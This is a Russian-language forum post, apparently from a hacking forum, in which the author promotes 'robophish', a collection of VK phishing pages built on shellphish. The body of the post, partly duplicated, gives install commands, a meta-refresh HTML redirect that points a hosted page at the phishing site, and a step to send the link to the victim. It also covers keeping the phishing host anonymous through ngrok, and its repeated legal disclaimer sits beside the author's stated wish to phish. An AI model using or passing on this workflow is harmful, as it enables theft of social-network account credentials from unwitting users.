Привет, это моя первая статья тут, да и думаю последняя.
Использование robophish для атаки целей без предварительного обоюдного согласия является незаконным. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчик не несет ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?
В итоге я нашел утилиту shellphish github.com/thelinuxchoice(не реклама)
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом.Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут(не реклама)
на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.
УСТАНОВКА:
5. Дальше все интуитивно понятно, нажимаем по ссылке(она оч некрасивая, нужно с ней что-то делать)
6.1 Идем на сайт
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт
7. Скидываем сайт жертве.
Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )
А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)
Использование robophish для атаки целей без предварительного обоюдного согласия является незаконным. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчик не несет ответственности за любое неправильное использование или ущерб, причиненный этой программой.
Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?
В итоге я нашел утилиту shellphish github.com/thelinuxchoice(не реклама)
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом.Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут(не реклама)
на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.
УСТАНОВКА:
Bash:
1. sudo apt-get install git
2. git clone gasayminajj/robophish
3. cd robophish
4. bash robophish.sh6.1 Идем на сайт
Ссылка скрыта от гостей
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт
HTML:
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )
А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)
Последнее редактирование:
